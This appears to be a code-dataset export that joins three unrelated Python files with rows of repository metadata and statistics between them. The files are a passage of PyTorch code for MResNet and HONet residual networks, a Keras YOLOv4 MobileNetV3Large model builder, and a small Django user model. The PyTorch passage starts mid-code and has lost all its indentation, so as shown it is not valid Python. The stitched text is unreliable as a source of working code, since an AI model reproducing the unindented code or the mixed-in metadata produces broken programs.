# 1], residual.size()[1], last_res.size()[1], l_last_res)
# print('planes, in_planes, last_res_planes, l_last_res_planes', self.planes, self.in_planes, self.last_res_planes, self.l_last_res_planes)
# else:
# print('F_x_n.size(), residual.size(),last_res.size(),l_last_res.size()', F_x_n.size()[1], residual.size()[1],last_res,l_last_res)
# print('planes, in_planes, last_res_planes, l_last_res_planes', self.planes, self.in_planes, self.last_res_planes, self.l_last_res_planes)
if not (isinstance(last_res, int) or isinstance(l_last_res, int)):
# print('HO')
# if 1:
if self.planes == 32:
if self.in_planes == 16:
residual = self.downsample_16_32_x(residual)
# print('residual.size()', residual.size())
if self.last_res_planes == 16:
last_res = self.downsample_16_32_l(last_res)
# print('last_res.size()', last_res.size())
if self.l_last_res_planes == 16:
l_last_res = self.downsample_16_32_ll(l_last_res)
# print('l_last_res.size()', l_last_res.size())
if self.planes == 64:
if self.in_planes == 16:
residual = self.downsample_16_64_x(residual)
if self.last_res_planes == 16:
last_res = self.downsample_16_64_l(last_res)
if self.l_last_res_planes == 16:
l_last_res = self.downsample_16_64_ll(l_last_res)
if self.in_planes == 32:
residual = self.downsample_32_64_x(residual)
if self.last_res_planes == 32:
last_res = self.downsample_32_64_l(last_res)
if self.l_last_res_planes == 32:
l_last_res = self.downsample_32_64_ll(l_last_res)
if self.planes == 128:
if self.in_planes == 64:
residual = self.downsample_64_128_x(residual)
if self.last_res_planes == 64:
last_res = self.downsample_64_128_l(last_res)
if self.l_last_res_planes == 64:
l_last_res = self.downsample_64_128_ll(l_last_res)
if self.planes == 256:
if self.in_planes == 128:
residual = self.downsample_128_256_x(residual)
if self.last_res_planes == 128:
last_res = self.downsample_128_256_l(last_res)
if self.l_last_res_planes == 128:
l_last_res = self.downsample_128_256_ll(l_last_res)
if not (isinstance(last_res, int) or isinstance(l_last_res, int)):
if not self.fix_k:
self.b_0 = (3 * self.k - 1) / (self.k * 2)
self.a_0 = (3 * self.k + 3) / (self.k * 4)
self.a_1 = -1 / (self.k)
self.a_2 = (self.k + 1) / (4 * self.k)
# x = torch.mul(b_0, F_x_n) + torch.mul(a_0, residual) + torch.mul(a_1, last_res) + torch.mul(a_2, l_last_res)
x = torch.mul(self.stepsize, torch.mul(self.b_0, F_x_n)) + torch.mul(self.a_0, residual) + torch.mul(
self.a_1, last_res) + torch.mul(self.a_2, l_last_res)
else:
# print('res')
x = F_x_n
l_last_res = last_res
last_res = residual # the current block's input becomes last_res for the next block
# residual = x
# print('x.sixe()[1], residual.size()[1]', x.size()[1], residual.size()[1])
return x, last_res, l_last_res, self.k
class Downsample(nn.Module): # ReLU and BN are involved in this downsample
def __init__(self, in_planes, out_planes, stride=2):
super(Downsample, self).__init__()
self.downsample = nn.Sequential(
nn.BatchNorm2d(in_planes),
nn.ReLU(inplace=True),
nn.Conv2d(in_planes, out_planes,
kernel_size=1, stride=stride, bias=False)
)
def forward(self, x):
x = self.downsample(x)
return x
class Downsample_clean(nn.Module): # ReLU and BN are involved in this downsample
def __init__(self, in_planes, out_planes, stride=2):
super(Downsample_clean, self).__init__()
self.downsample_ = nn.Sequential(
# nn.BatchNorm2d(in_planes),
# nn.ReLU(inplace=True),
nn.Conv2d(in_planes, out_planes,
kernel_size=1, stride=stride, bias=False)
)
def forward(self, x):
x = self.downsample_(x)
return x
class Downsample_real(nn.Module): # ReLU and BN are not involved in this downsample
def __init__(self, in_shape, out_shape):
super(Downsample_real, self).__init__()
# in_shape = x.shape()
self.in_planes = in_shape[1]
self.out_planes = out_shape[1]
self.stride = int(in_shape[2] / out_shape[2])
# [256, 64, 32, 32]->[256, 128, 16, 16]
self.downsample_real = nn.Sequential(
# nn.BatchNorm2d(in_planes),
# nn.ReLU(inplace=True),
nn.Conv2d(self.in_planes, self.out_planes,
kernel_size=1, stride=self.stride, bias=False)
)
def forward(self, x):
x = self.downsample_real(x)
return x
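# --- Added shape sketch for the downsample helpers above (not original code) ---
# All three variants reduce to a 1x1 convolution: stride 2 halves both spatial dims while the
# channel count is remapped from in_planes to out_planes (Downsample also applies BN + ReLU first).
def _downsample_shape_check():
    y = Downsample(16, 32)(torch.randn(1, 16, 32, 32))
    return y.shape  # torch.Size([1, 32, 16, 16])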
class MResNet(nn.Module):
# def __init__(self,block,layers,pretrain=True,num_classes=num_cla,stochastic_depth=False,PL=0.5,noise_level=0.001,noise=False):
def __init__(self, block, layers, pretrain=False, num_classes=num_cla, stochastic_depth=False, PL=1.0,
noise_level=0.001, noise=False):
self.in_planes = 16
self.planes = [16, 32, 64]
self.strides = [1, 2, 2]
super(MResNet, self).__init__()
self.noise = noise # noise flag from the constructor; not referenced anywhere in this class
self.block = block
self.conv1 = nn.Conv2d(3, 16, kernel_size=3, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(16)
self.relu = nn.ReLU(inplace=True)
self.pretrain = pretrain
self.ks = nn.ParameterList([nn.Parameter(torch.Tensor(1).uniform_(1.0, 1.1)) for i in
range(layers[0] + layers[1] + layers[2])]) # each layer has a trainable $k_n$
self.stochastic_depth = stochastic_depth
blocks = []
n = layers[0] + layers[1] + layers[2]
if not self.stochastic_depth:
for i in range(3):
blocks.append(block(self.in_planes, self.planes[i], self.strides[i]))
self.in_planes = self.planes[i] * block.expansion
for j in range(1, layers[
i]): # Recalling "MResNet(BasicBlock,[3,3,3],**kwargs)": "layers" is "[3,3,3]", so j runs from 1 to 2
blocks.append(block(self.in_planes, self.planes[i])) # three (Basic) Blocks
else: # with death_rates
death_rates = [i / (n - 1) * (1 - PL) for i in range(n)] # n is the sum of elements of "[3,3,3]"
# print(death_rates)
for i in range(3):
blocks.append(block(self.in_planes, self.planes[i], self.strides[i],
death_rate=death_rates[i * layers[0]])) # note that layers[k] == layers[j]
self.in_planes = self.planes[i] * block.expansion
for j in range(1, layers[i]):
blocks.append(block(self.in_planes, self.planes[i], death_rate=death_rates[i * layers[0] + j]))
self.blocks = nn.ModuleList(blocks) # ModuleList registers the blocks but, unlike Sequential, imposes no execution order; forward() defines it
self.downsample1 = Downsample(16, 64, stride=1) # Downsample: (in_planes,out_planes,stride=2):
# self.downsample1=nn.Conv2d(16, 64,
# kernel_size=1, stride=1, bias=False)
self.downsample21 = Downsample(16 * block.expansion,
32 * block.expansion) # "expansion" is 1 for BasicBlocks and is 4 for the Bottleneck
# self.downsample22=Downsample(16*block.expansion,32*block.expansion)
self.downsample31 = Downsample(32 * block.expansion, 64 * block.expansion)
# self.downsample32=Downsample(32*block.expansion,64*block.expansion)
self.bn = nn.BatchNorm2d(64 * block.expansion)
self.avgpool = nn.AvgPool2d(8)
self.fc = nn.Linear(64 * block.expansion, num_classes)
for m in self.modules(): # initialization
if isinstance(m, nn.Conv2d): # if m is a conv
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels # element num of the kernel
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def change_state(self):
self.pretrain = not self.pretrain
def forward(self, x):
x = self.conv1(x)
# x=self.bn1(x)
# x=self.relu(x)
if self.block.expansion == 4: # 4 is the "expansion" of the "Bottleneck". If "Bottleneck" is used, we need to downsample
residual = self.downsample1(x) # residual.size()[1]: 16->64
else:
residual = x
x = self.blocks[0](x) + residual # x.size()[1]: 16->64
last_res = residual
for i, b in enumerate(self.blocks): # index and content
if i == 0:
continue
residual = x
if b.in_planes != b.planes * b.expansion: # sizes of the input and output are not the same
if b.planes == 32:
residual = self.downsample21(x)
# if not self.pretrain:
# last_res=self.downsample22(last_res)
elif b.planes == 64:
residual = self.downsample31(x)
# if not self.pretrain:
# last_res=self.downsample32(last_res)
x = b(x)
# print(x.size())
# print(residual.size())
x += residual
elif self.pretrain: #
x = b(x) + residual
else: # in.channel = out.channel and not pretrain
x = b(x) + self.ks[i].expand_as(residual) * residual + (1 - self.ks[i]).expand_as(
last_res) * last_res # "B.expand_as (A)": expand B in A's shape
last_res = residual
x = self.bn(x)
x = self.relu(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
x = self.fc(x)
return x, self.ks
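# --- Minimal smoke-test sketch for MResNet (added, not original) ---
# Assumptions: CIFAR-sized 32x32 inputs (implied by the AvgPool2d(8) head) and the
# "MResNet(BasicBlock,[3,3,3])" configuration mentioned in the comments above, using the
# BasicBlock_cifar defined in this file. forward() returns the logits together with the
# ParameterList of trainable k values.
def _mresnet_smoke_test():
    model = MResNet(BasicBlock_cifar, [3, 3, 3], num_classes=10)
    logits, ks = model(torch.randn(2, 3, 32, 32))
    return logits.shape, len(ks)  # expected: (torch.Size([2, 10]), 9)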
class HONet_v2(nn.Module):
def __init__(self, block, layers, k_ini=-9.0 / 5, pretrain=False, num_classes=num_cla, stochastic_depth=False,
PL=1.0, noise_level=0.001,
noise=False):
self.in_planes = 16
self.planes = [16, 32, 64]
self.last_res_planes = -1
self.l_last_res_planes = -1
self.strides = [1, 2, 2]
super(HONet_v2, self).__init__()
self.noise = noise # noise flag from the constructor; not referenced anywhere in this class
self.block = block
self.conv1 = nn.Conv2d(3, 16, kernel_size=3, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(16)
self.relu = nn.ReLU(inplace=True)
self.pretrain = pretrain
self.stochastic_depth = stochastic_depth
self.k_ini = k_ini
# self.stepsize =nn.Parameter(torch.Tensor(1).uniform_(1, 1))
blocks = []
self.ks = []
n = layers[0] + layers[1] + layers[2]
l = 0
if not self.stochastic_depth:
for i in range(3): # there are 3 elements in the list like [7,7,7]
# print('v2: self.planes[i], self.in_planes, self.last_res_planes, self.l_last_res_planes', self.planes[i]* block.expansion, self.in_planes, self.last_res_planes, self.l_last_res_planes)
blocks.append(
block(self.in_planes, self.planes[i], self.last_res_planes, self.l_last_res_planes, self.strides[i],
k_ini=self.k_ini))
# ###
# if
#
# ###
# self.l_last_res_planes = self.last_res_planes
# self.last_res_planes = self.in_planes
if l == 0 or l == 1:
self.l_last_res_planes = self.last_res_planes
self.last_res_planes = self.in_planes
else:
self.l_last_res_planes = self.planes[i] * block.expansion
self.last_res_planes = self.planes[i] * block.expansion
self.in_planes = self.planes[i] * block.expansion
l += 1
# print('l', l)
# print('i', i)
for j in range(1, layers[
i]): # Recalling "MResNet(BasicBlock,[3,3,3],**kwargs)", and "layers" is assigned as "[3,3,3]"; then j is 1 to 2
# if l == 0:
# self.l_last_res_planes = self.last_res_planes
# self.last_res_planes = self.in_planes
#
# elif l==1:
# self.l_last_res_planes = self.last_res_planes
# self.last_res_planes = self.in_planes
# else:
# self.l_last_res_planes = self.planes[i]*block.expansion
# self.last_res_planes = self.planes[i]*block.expansion
# self.plane = self.planes[i]*block.expansion
# print('j', j)
# print('v2: self.planes[i], self.in_planes, self.last_res_planes, self.l_last_res_planes', self.planes[i]* block.expansion, self.in_planes, self.last_res_planes, self.l_last_res_planes)
blocks.append(block(self.in_planes, self.planes[i], self.last_res_planes, self.l_last_res_planes,
k_ini=self.k_ini)) # three (Basic) Blocks
# self.l_last_res_planes = self.last_res_planes
# self.last_res_planes = self.in_planes
if l == 0 or l == 1:
self.l_last_res_planes = self.last_res_planes
self.last_res_planes = self.in_planes
else:
self.l_last_res_planes = self.planes[i] * block.expansion
self.last_res_planes = self.planes[i] * block.expansion
l += 1
# print('l', l)
else: # with death_rates
death_rates = [i / (n - 1) * (1 - PL) for i in range(n)] # n is the sum of elements of "[3,3,3]"
# print(death_rates)
for i in range(3):
blocks.append(
block(self.in_planes, self.planes[i], self.last_res_planes, self.l_last_res_planes, self.strides[i],
k_ini=self.k_ini, death_rate=death_rates[i * layers[0]])) # note that layers[k] == layers[j]
self.l_last_res_planes = self.last_res_planes
self.last_res_planes = self.in_planes
self.in_planes = self.planes[i] * block.expansion
# print('i', i)
for j in range(1, layers[i]):
# print('j', j)
blocks.append(block(self.in_planes, self.planes[i], self.last_res_planes, self.l_last_res_planes,
k_ini=self.k_ini, death_rate=death_rates[i * layers[0] + j]))
self.l_last_res_planes = self.last_res_planes
self.last_res_planes = self.in_planes
self.blocks = nn.ModuleList(blocks) # ModuleList registers the blocks but, unlike Sequential, imposes no execution order; forward() defines it
self.downsample1 = Downsample(16, 64, stride=1) # Downsample: (in_planes,out_planes,stride):
self.bn = nn.BatchNorm2d(64 * block.expansion)
self.avgpool = nn.AvgPool2d(8)
self.fc = nn.Linear(64 * block.expansion, num_classes)
for m in self.modules(): # initialization
if isinstance(m, nn.Conv2d): # if m is a conv
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels # element num of the kernel
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def change_state(self):
self.pretrain = not self.pretrain
def forward(self, x):
self.ks = []
x = self.conv1(x)
last_res = -1
l_last_res = -1
# x=self.bn1(x)
# x=self.relu(x)
if self.block.expansion == 4: # 4 is the "expansion" of the "Bottleneck". If "Bottleneck" is used, we need to downsample
residual = self.downsample1(x)
# print('downsample1')
else:
residual = x
x, last_res, l_last_res, k = self.blocks[0](x, last_res, l_last_res)
# print('v2: x.sixe()[1], residual.size()[1]', x.size()[1], residual.size()[1])
x += residual
# l_last_res = residual
residual = x
x, last_res, l_last_res, k = self.blocks[1](x, last_res, l_last_res)
# x = self.blocks[1](x)[0] + residual
x += residual
# last_res = residual
# residual = x # moved from below. Flag:318
### \end
for i, b in enumerate(self.blocks): # index and content
if i == 0 or i == 1:
# print('i', i)
continue
residual = x # moved up. Flag:318
####
# if b.in_planes != b.planes * b.expansion: # sizes of the input and output are not the same
# if b.planes == 32:
# residual = self.downsample21(x)
# # if not self.pretrain:
# # last_res=self.downsample22(last_res)
# elif b.planes == 64:
# residual = self.downsample31(x)
#
# x = b(x)
# # print(x.size())
# # print(residual.size())
# x += residual
####
if self.pretrain: #
x = b(x) + residual
else: # in.channel = out.channel and not pretrain
# \begin HONet core
x, last_res, l_last_res, k = b(x, last_res, l_last_res)
self.ks += k.data
# print('i, ks', i, self.ks)
# \end HONet core
# print('cnt', cnt1, cnt2, cnt3, cnt4)
x = self.bn(x)
x = self.relu(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
x = self.fc(x)
# print('out')
return x, self.ks
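# --- Analogous smoke-test sketch for HONet_v2 (added, not original) ---
# Same assumptions as the MResNet sketch above; HOBlock carries the two extra residual states,
# and forward() returns the logits plus the per-block k values collected during the pass
# (the first two blocks fall back to the plain-residual branch, so 7 values for [3,3,3]).
def _honet_v2_smoke_test():
    model = HONet_v2(HOBlock, [3, 3, 3], num_classes=10)
    logits, ks = model(torch.randn(2, 3, 32, 32))
    return logits.shape, len(ks)  # expected: (torch.Size([2, 10]), 7)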
class HONet_stepsize(nn.Module):
def __init__(self, block, layers, k_ini=-9.0 / 5, pretrain=False, num_classes=num_cla, stochastic_depth=False,
PL=1.0, noise_level=0.001,
noise=False, dataset='cifar10'):
self.in_planes = 16
self.planes = [16, 32, 64]
self.last_res_planes = -1
self.l_last_res_planes = -1
self.strides = [1, 2, 2]
super(HONet_stepsize, self).__init__()
self.noise = noise # what for?
self.block = block
self.conv1 = nn.Conv2d(3, 16, kernel_size=3, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(16)
self.relu = nn.ReLU(inplace=True)
self.pretrain = pretrain
self.stochastic_depth = stochastic_depth
self.k_ini = k_ini
self.stepsize = nn.Parameter(torch.Tensor(1).uniform_(1, 1))
blocks = []
self.ks = []
n = layers[0] + layers[1] + layers[2]
l = 0
if not self.stochastic_depth:
for i in range(3): # there are 3 elements in the list like [7,7,7]
# print('v2: self.planes[i], self.in_planes, self.last_res_planes, self.l_last_res_planes', self.planes[i]* block.expansion, self.in_planes, self.last_res_planes, self.l_last_res_planes)
blocks.append(
block(self.in_planes, self.planes[i], self.last_res_planes, self.l_last_res_planes, self.strides[i],
k_ini=self.k_ini, stepsize=self.stepsize))
# ###
# if
#
# ###
# self.l_last_res_planes = self.last_res_planes
# self.last_res_planes = self.in_planes
if l == 0 or l == 1:
self.l_last_res_planes = self.last_res_planes
self.last_res_planes = self.in_planes
else:
self.l_last_res_planes = self.planes[i] * block.expansion
self.last_res_planes = self.planes[i] * block.expansion
self.in_planes = self.planes[i] * block.expansion
l += 1
# print('l', l)
# print('i', i)
for j in range(1, layers[i]):  # recalling MResNet(BasicBlock, [3, 3, 3], **kwargs), "layers" is e.g. [3, 3, 3], so j runs from 1 to layers[i] - 1
# if l == 0:
# self.l_last_res_planes = self.last_res_planes
# self.last_res_planes = self.in_planes
#
# elif l==1:
# self.l_last_res_planes = self.last_res_planes
# self.last_res_planes = self.in_planes
# else:
# self.l_last_res_planes = self.planes[i]*block.expansion
# self.last_res_planes = self.planes[i]*block.expansion
# self.plane = self.planes[i]*block.expansion
# print('j', j)
# print('v2: self.planes[i], self.in_planes, self.last_res_planes, self.l_last_res_planes', self.planes[i]* block.expansion, self.in_planes, self.last_res_planes, self.l_last_res_planes)
blocks.append(block(self.in_planes, self.planes[i], self.last_res_planes, self.l_last_res_planes,
k_ini=self.k_ini, stepsize=self.stepsize)) # three (Basic) Blocks
# self.l_last_res_planes = self.last_res_planes
# self.last_res_planes = self.in_planes
if l == 0 or l == 1:
self.l_last_res_planes = self.last_res_planes
self.last_res_planes = self.in_planes
else:
self.l_last_res_planes = self.planes[i] * block.expansion
self.last_res_planes = self.planes[i] * block.expansion
l += 1
# print('l', l)
else: # with death_rates
death_rates = [i / (n - 1) * (1 - PL) for i in range(n)]  # linear stochastic-depth schedule over all n blocks; e.g. with n = 9 and PL = 0.5 the rates climb from 0.0 to 0.5
# print(death_rates)
for i in range(3):
blocks.append(
block(self.in_planes, self.planes[i], self.last_res_planes, self.l_last_res_planes, self.strides[i],
k_ini=self.k_ini, stepsize=self.stepsize,
death_rate=death_rates[i * layers[0]]))  # all entries of "layers" are equal, so layers[0] indexes the first block of stage i
self.l_last_res_planes = self.last_res_planes
self.last_res_planes = self.in_planes
self.in_planes = self.planes[i] * block.expansion
# print('i', i)
for j in range(1, layers[i]):
# print('j', j)
blocks.append(block(self.in_planes, self.planes[i], self.last_res_planes, self.l_last_res_planes,
k_ini=self.k_ini, stepsize=self.stepsize,
death_rate=death_rates[i * layers[0] + j]))
self.l_last_res_planes = self.last_res_planes
self.last_res_planes = self.in_planes
self.blocks = nn.ModuleList(blocks)  # ModuleList only registers the blocks; the order they run in is spelled out explicitly in forward()
self.downsample1 = Downsample(16, 64, stride=1)  # Downsample(in_planes, out_planes, stride)
self.bn = nn.BatchNorm2d(64 * block.expansion)
self.avgpool = nn.AvgPool2d(8)
self.fc = nn.Linear(64 * block.expansion, num_classes)
for m in self.modules(): # initialization
if isinstance(m, nn.Conv2d): # if m is a conv
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels  # fan-out of the conv; weights drawn with std = sqrt(2 / fan_out) (He initialization)
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def change_state(self):
self.pretrain = not self.pretrain
def forward(self, x):
| 46.439909
| 207
| 0.55293
| 5,588
| 40,960
| 3.808518
| 0.046886
| 0.094399
| 0.103844
| 0.076685
| 0.882718
| 0.866131
| 0.84851
| 0.833991
| 0.819331
| 0.809181
| 0
| 0.048428
| 0.333032
| 40,960
| 882
| 208
| 46.439909
| 0.73059
| 0.215552
| 0
| 0.793269
| 0
| 0
| 0.00364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.017628
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c5910582bc688be2b74caac99851984e2f67fa15
| 6,691
|
py
|
Python
|
yolo4/models/yolo4_mobilenetv3_large.py
|
rootadminWalker/keras-YOLOv3-model-set
|
196ec711975e1821a260a9f6523008bf47ff8c84
|
[
"MIT"
] | null | null | null |
yolo4/models/yolo4_mobilenetv3_large.py
|
rootadminWalker/keras-YOLOv3-model-set
|
196ec711975e1821a260a9f6523008bf47ff8c84
|
[
"MIT"
] | null | null | null |
yolo4/models/yolo4_mobilenetv3_large.py
|
rootadminWalker/keras-YOLOv3-model-set
|
196ec711975e1821a260a9f6523008bf47ff8c84
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""YOLO_v4 MobileNetV3Large Model Defined in Keras."""
from tensorflow.keras.layers import ZeroPadding2D, UpSampling2D, Concatenate
from tensorflow.keras.models import Model
from ...common.backbones.mobilenet_v3 import MobileNetV3Large
#from yolo4.models.layers import compose, DarknetConv2D, DarknetConv2D_BN_Leaky, Spp_Conv2D_BN_Leaky, Depthwise_Separable_Conv2D_BN_Leaky, Darknet_Depthwise_Separable_Conv2D_BN_Leaky, make_yolo_head, make_yolo_spp_head, make_yolo_depthwise_separable_head, make_yolo_spp_depthwise_separable_head
from .layers import yolo4_predictions, yolo4lite_predictions, tiny_yolo4_predictions, tiny_yolo4lite_predictions
def yolo4_mobilenetv3large_body(inputs, num_anchors, num_classes, alpha=1.0):
"""Create YOLO_V4 MobileNetV3Large model CNN body in Keras."""
mobilenetv3large = MobileNetV3Large(input_tensor=inputs, weights='imagenet', include_top=False, alpha=alpha)
print('backbone layers number: {}'.format(len(mobilenetv3large.layers)))
# input: 416 x 416 x 3
# activation_38(layer 194, final feature map): 13 x 13 x (960*alpha)
# expanded_conv_14/Add(layer 191, end of block14): 13 x 13 x (160*alpha)
# activation_29(layer 146, middle in block12) : 26 x 26 x (672*alpha)
# expanded_conv_11/Add(layer 143, end of block11) : 26 x 26 x (112*alpha)
# activation_15(layer 79, middle in block6) : 52 x 52 x (240*alpha)
# expanded_conv_5/Add(layer 76, end of block5): 52 x 52 x (40*alpha)
# NOTE: activation layer names may differ between TF1.x and TF2.x, so we
# use layer indices to fetch the feature maps
# f1: 13 x 13 x (960*alpha)
f1 = mobilenetv3large.layers[194].output
# f2: 26 x 26 x (672*alpha) for 416 input
f2 = mobilenetv3large.layers[146].output
# f3: 52 x 52 x (240*alpha) for 416 input
f3 = mobilenetv3large.layers[79].output
f1_channel_num = int(960*alpha)
f2_channel_num = int(672*alpha)
f3_channel_num = int(240*alpha)
#f1_channel_num = 1024
#f2_channel_num = 512
#f3_channel_num = 256
y1, y2, y3 = yolo4_predictions((f1, f2, f3), (f1_channel_num, f2_channel_num, f3_channel_num), num_anchors, num_classes)
return Model(inputs, [y1, y2, y3])
def yolo4lite_mobilenetv3large_body(inputs, num_anchors, num_classes, alpha=1.0):
'''Create YOLO_v4 Lite MobileNetV3Large model CNN body in keras.'''
mobilenetv3large = MobileNetV3Large(input_tensor=inputs, weights='imagenet', include_top=False, alpha=alpha)
print('backbone layers number: {}'.format(len(mobilenetv3large.layers)))
# input: 416 x 416 x 3
# activation_38(layer 194, final feature map): 13 x 13 x (960*alpha)
# expanded_conv_14/Add(layer 191, end of block14): 13 x 13 x (160*alpha)
# activation_29(layer 146, middle in block12) : 26 x 26 x (672*alpha)
# expanded_conv_11/Add(layer 143, end of block11) : 26 x 26 x (112*alpha)
# activation_15(layer 79, middle in block6) : 52 x 52 x (240*alpha)
# expanded_conv_5/Add(layer 76, end of block5): 52 x 52 x (40*alpha)
# NOTE: activation layer names may differ between TF1.x and TF2.x, so we
# use layer indices to fetch the feature maps
# f1: 13 x 13 x (960*alpha)
f1 = mobilenetv3large.layers[194].output
# f2: 26 x 26 x (672*alpha) for 416 input
f2 = mobilenetv3large.layers[146].output
# f3: 52 x 52 x (240*alpha) for 416 input
f3 = mobilenetv3large.layers[79].output
f1_channel_num = int(960*alpha)
f2_channel_num = int(672*alpha)
f3_channel_num = int(240*alpha)
#f1_channel_num = 1024
#f2_channel_num = 512
#f3_channel_num = 256
y1, y2, y3 = yolo4lite_predictions((f1, f2, f3), (f1_channel_num, f2_channel_num, f3_channel_num), num_anchors, num_classes)
return Model(inputs, [y1, y2, y3])
def tiny_yolo4_mobilenetv3large_body(inputs, num_anchors, num_classes, alpha=1.0, use_spp=True):
'''Create Tiny YOLO_v4 MobileNetV3Large model CNN body in keras.'''
mobilenetv3large = MobileNetV3Large(input_tensor=inputs, weights='imagenet', include_top=False, alpha=alpha)
print('backbone layers number: {}'.format(len(mobilenetv3large.layers)))
# input: 416 x 416 x 3
# activation_38(layer 194, final feature map): 13 x 13 x (960*alpha)
# expanded_conv_14/Add(layer 191, end of block14): 13 x 13 x (160*alpha)
# activation_29(layer 146, middle in block12) : 26 x 26 x (672*alpha)
# expanded_conv_11/Add(layer 143, end of block11) : 26 x 26 x (112*alpha)
# activation_15(layer 79, middle in block6) : 52 x 52 x (240*alpha)
# expanded_conv_5/Add(layer 76, end of block5): 52 x 52 x (40*alpha)
# f1 :13 x 13 x (960*alpha)
# NOTE: activation layer names may differ between TF1.x and TF2.x, so we
# use layer indices to fetch the feature maps
f1 = mobilenetv3large.layers[194].output
# f2: 26 x 26 x (672*alpha) for 416 input
f2 = mobilenetv3large.layers[146].output
f1_channel_num = int(960*alpha)
f2_channel_num = int(672*alpha)
#f1_channel_num = 1024
#f2_channel_num = 512
y1, y2 = tiny_yolo4_predictions((f1, f2), (f1_channel_num, f2_channel_num), num_anchors, num_classes, use_spp)
return Model(inputs, [y1,y2])
def tiny_yolo4lite_mobilenetv3large_body(inputs, num_anchors, num_classes, alpha=1.0, use_spp=True):
'''Create Tiny YOLO_v4 Lite MobileNetV3Large model CNN body in keras.'''
mobilenetv3large = MobileNetV3Large(input_tensor=inputs, weights='imagenet', include_top=False, alpha=alpha)
print('backbone layers number: {}'.format(len(mobilenetv3large.layers)))
# input: 416 x 416 x 3
# activation_38(layer 194, final feature map): 13 x 13 x (960*alpha)
# expanded_conv_14/Add(layer 191, end of block14): 13 x 13 x (160*alpha)
# activation_29(layer 146, middle in block12) : 26 x 26 x (672*alpha)
# expanded_conv_11/Add(layer 143, end of block11) : 26 x 26 x (112*alpha)
# activation_15(layer 79, middle in block6) : 52 x 52 x (240*alpha)
# expanded_conv_5/Add(layer 76, end of block5): 52 x 52 x (40*alpha)
# f1 :13 x 13 x (960*alpha)
# NOTE: activation layer names may differ between TF1.x and TF2.x, so we
# use layer indices to fetch the feature maps
f1 = mobilenetv3large.layers[194].output
# f2: 26 x 26 x (672*alpha) for 416 input
f2 = mobilenetv3large.layers[146].output
f1_channel_num = int(960*alpha)
f2_channel_num = int(672*alpha)
#f1_channel_num = 1024
#f2_channel_num = 512
y1, y2 = tiny_yolo4lite_predictions((f1, f2), (f1_channel_num, f2_channel_num), num_anchors, num_classes, use_spp)
return Model(inputs, [y1,y2])
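# Hypothetical usage sketch (not part of the original module): building the full
# YOLOv4 MobileNetV3Large body defined above, e.g. from the package's training code.
# The 416x416 input size matches the feature-map comments above; the anchor and
# class counts below are illustrative assumptions.
#
#   from tensorflow.keras.layers import Input
#   image_input = Input(shape=(416, 416, 3))
#   model = yolo4_mobilenetv3large_body(image_input, num_anchors=3, num_classes=80)
#   model.summary()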
| 44.90604
| 295
| 0.697355
| 1,039
| 6,691
| 4.317613
| 0.127045
| 0.066875
| 0.013375
| 0.01605
| 0.879626
| 0.865805
| 0.865805
| 0.865805
| 0.865805
| 0.865805
| 0
| 0.124534
| 0.198326
| 6,691
| 148
| 296
| 45.209459
| 0.711782
| 0.487371
| 0
| 0.727273
| 0
| 0
| 0.04254
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.090909
| 0
| 0.272727
| 0.090909
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c59f809fc81c3744048ad3ed5c1dc1596d170d33
| 248
|
py
|
Python
|
nsd1805/python/day20/mysite/market/models.py
|
MrWangwf/nsd1806
|
069e993b0bb64cb21adc2a25aa56f6da674453bc
|
[
"Apache-2.0"
] | null | null | null |
nsd1805/python/day20/mysite/market/models.py
|
MrWangwf/nsd1806
|
069e993b0bb64cb21adc2a25aa56f6da674453bc
|
[
"Apache-2.0"
] | null | null | null |
nsd1805/python/day20/mysite/market/models.py
|
MrWangwf/nsd1806
|
069e993b0bb64cb21adc2a25aa56f6da674453bc
|
[
"Apache-2.0"
] | null | null | null |
from django.db import models
class Userdb(models.Model):
username = models.CharField(max_length=20)
salt = models.CharField(max_length=8)
password = models.CharField(max_length=100)
def __str__(self):
return self.username
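# Hypothetical usage sketch (not part of the original module): creating a Userdb row
# with a random 8-character salt and a salted SHA-256 password hash, matching the
# field lengths declared above (salt: max_length=8, password: max_length=100).
#
#   import hashlib, os
#   salt = os.urandom(4).hex()                                         # 8 hex chars
#   pw_hash = hashlib.sha256((salt + 'secret').encode()).hexdigest()   # 64 chars
#   Userdb.objects.create(username='wang', salt=salt, password=pw_hash)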
| 24.8
| 47
| 0.721774
| 33
| 248
| 5.212121
| 0.636364
| 0.261628
| 0.313953
| 0.418605
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.029557
| 0.181452
| 248
| 9
| 48
| 27.555556
| 0.817734
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0.142857
| 0.142857
| 0.142857
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
